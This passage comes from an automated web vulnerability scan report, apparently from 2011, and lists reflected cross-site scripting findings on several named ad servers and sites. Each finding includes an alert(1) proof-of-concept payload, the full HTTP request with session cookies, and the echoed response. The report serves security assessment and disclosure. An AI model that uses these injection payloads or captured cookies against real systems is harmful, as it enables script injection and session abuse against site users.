Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:46 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3512


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15175622ebb1--><script>alert(1)</script>46c8034e10" -->
...[SNIP]...

4.83. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 7aee0--><script>alert(1)</script>b7befdbe7d1 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=885768&ps=-17aee0--><script>alert(1)</script>b7befdbe7d1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3954


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-17aee0--><script>alert(1)</script>b7befdbe7d1" -->
   
...[SNIP]...

4.84. http://ads1.revenue.net/j [r_num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The value of the r_num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773cd'%3balert(1)//8a6389b8181 was submitted in the r_num parameter. This input was echoed as 773cd';alert(1)//8a6389b8181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537773cd'%3balert(1)//8a6389b8181 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:57 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CACl2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzc3M2NkJzthbGVydCgxKS8vOGE2Mzg5YjgxOFgGDDowOjEzMDUyNDQ0OTc6MbABBDAxMjk3Oi0pBAAHMTMwNTIwMTI5NxEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537773cd';alert(1)//8a6389b8181&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169&">
...[SNIP]...

4.85. http://ads1.revenue.net/j [site_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The value of the site_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2f3e'%3balert(1)//3c32c462e94 was submitted in the site_id parameter. This input was echoed as a2f3e';alert(1)//3c32c462e94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /j?site_id=12169a2f3e'%3balert(1)//3c32c462e94&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:56 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CADt2OjE6MToxMjE2OWEyZjNlJzthbGVydCgxKS8vM2MzMmM0NjJlOTQ6MjI3MjQ1OjM0NDA6NTg0Mzc1Mzc6MTowOjEzMDUyNDQ0OTY6MbABBDAxMjk2Oi0pBAAHMTMwNTIwMTI5NhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169a2f3e';alert(1)//3c32c462e94&">
...[SNIP]...

4.86. http://adserving.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abf19'-alert(1)-'e26e9738d4e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0abf19'-alert(1)-'e26e9738d4e&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:34 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=0x0abf19'-alert(1)-'e26e9738d4e&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdU
...[SNIP]...

4.87. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2af3e'-alert(1)-'acaaadb8c74 was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=02af3e'-alert(1)-'acaaadb8c74&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:12 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=02af3e'-alert(1)-'acaaadb8c74&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kG
...[SNIP]...

4.88. http://adserving.cpxinteractive.com/st [pop_times parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 415c8'-alert(1)-'0163bb86c01 was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1415c8'-alert(1)-'0163bb86c01&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:04 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1415c8'-alert(1)-'0163bb86c01&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pR
...[SNIP]...

4.89. http://adserving.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ae4f'-alert(1)-'10d8742ce91 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=17487132ae4f'-alert(1)-'10d8742ce91&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:42 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=17487132ae4f'-alert(1)-'10d8742ce91&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4Ux
...[SNIP]...

4.90. https://ams-legal.net/support/Login.asp [userid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/Login.asp

Issue detail

The value of the userid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e187d"><script>alert(1)</script>9ba0e3ea2194d98f4 was submitted in the userid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /support/Login.asp?newPassword=1&userid=e187d"><script>alert(1)</script>9ba0e3ea2194d98f4&password= HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 3024
Content-Type: text/html
Expires: Thu, 12 May 2011 12:33:05 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...
<input id="userid" name="userid" type="text" value="e187d"><script>alert(1)</script>9ba0e3ea2194d98f4" onFocus="window.status='Required field. Please enter your user ID';" />
...[SNIP]...

4.91. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706 was submitted in the REST URL parameter 3. This input was echoed as 31754<img src=a onerror=alert(1)>d4c46211706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG31754<img%20src%3da%20onerror%3dalert(1)>d4c46211706/5000//20110401-102631?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:49 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3527
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");


}({
accountId : "AENDU0IN29GG31754<img src=a onerror=alert(1)>d4c46211706",
internalId : "",
customField : "20110401-102631",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes :
...[SNIP]...

4.92. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a was submitted in the REST URL parameter 5. This input was echoed as 472fe<img src=a onerror=alert(1)>4d759b0f60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631472fe<img%20src%3da%20onerror%3dalert(1)>4d759b0f60a?cc=0.7025338695384562&modified=20110401-102631 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FE10F04CB4E1537E78031D282002DCB7.3DF39F9B; rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:11 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript
Content-Length: 3551
P3P: CP="NOI COR CURa INT"

// ----------------------------------------------------------------------------
if (typeof(ACCESSIBLE_VERSION) == "undefined") { ACCESSIBLE_VERSION = false; }
// --------------------------------------
...[SNIP]...
</SCRIPT>");


}({
accountId : "AENDU0IN29GG",
internalId : "",
customField : "20110401-102631472fe<img src=a onerror=alert(1)>4d759b0f60a",
server : "cgiwsc.enhancedsitebuilder.com:80",
cgiPath : "/cgi-bin/Footer",
cgiRes : "http://cgiwsc.enhancedsitebuilder.com:80/cgi",
productId
...[SNIP]...

4.93. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732 was submitted in the REST URL parameter 3. This input was echoed as dbb84<img src=a onerror=alert(1)>c65bf2df732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGdbb84<img%20src%3da%20onerror%3dalert(1)>c65bf2df732/7008/16420/language%3Aen%3Bcountry%3AUS%3B?cc=0.6917730856221169 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/26401.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rauth.session=8237970b60c26fc1be1f1dfe55f958e2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:08:10 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGdbb84<img src=a onerror=alert(1)>c65bf2df732,7008,16420]

4.94. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 380e8<img%20src%3da%20onerror%3dalert(1)>95c2f9acef8 was submitted in the REST URL parameter 4. This input was echoed as 380e8<img src=a onerror=alert(1)>95c2f9acef8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

